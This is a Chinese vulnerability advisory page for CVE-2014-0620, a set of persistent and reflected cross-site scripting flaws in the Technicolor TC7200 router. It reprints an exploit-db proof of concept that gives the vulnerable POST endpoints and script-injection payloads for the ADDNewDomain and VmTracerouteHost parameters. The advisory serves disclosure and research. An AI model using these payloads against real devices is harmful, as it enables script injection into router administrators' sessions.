Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Technicolor TC7200多个跨站脚本执行漏洞

发布日期:2014-01-07
更新日期:2014-01-09受影响系统:
technicolor TC7200 STD6.01.12
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-0620Technicolor TC7200是调制解调器和路由器产品。Technicolor TC7200 STD6.01.12在实现上存在多个跨站请求伪造漏洞,远程攻击者通过parental/website-filters.asp的ADDNewDomain参数,或者goform/status/diagnostics-route的VmTracerouteHost参数,利用此漏洞可注入任意Web脚本或HTML。<*来源:Jeroen - IT Nerdbox
 
  链接:http://www.exploit-db.com/exploits/30668/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0620
#
# Proof of Concept:
#
#
## Persistent Cross Site Scripting:

# POST      : http://<ip>/parental/website-filters.asp
# Parameters:

# WebFilteringTable          0
# WebFilteringChangePolicies 0
# WebFiltersADDKeywords   
# WebFilteringdomainMode   0
# ADDNewDomain             <script>alert("IT Nerdbox");</script>
# WebFiltersKeywordButton    0
# WebFiltersDomainButton   1
# WebPolicyName   
# WebFiltersRemove         0
# WebFiltersADD              0
# WebFiltersReset            0
#
#
## Reflected Cross Site Scripting
#
# POST      : http://<ip>//goform/status/diagnostics-route
# Parameters:
#
# VmTracerouteHost    "><script>alert("IT  Nerdbox");</script>
# VmMaxTTL            30
# VmTrIsInProgress    0
# VmTrUtilityCommand  1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/建议:
--------------------------------------------------------------------------------
厂商补丁:technicolor
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gatewaX.Org libXfont BDF字体文件处理栈缓冲区溢出漏洞Cisco Unified Communications Manager未授权访问漏洞相关资讯      Technicolor TC7200 
  • Technicolor TC7200多个跨站脚本请  (01/07/2014 12:09:51)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论<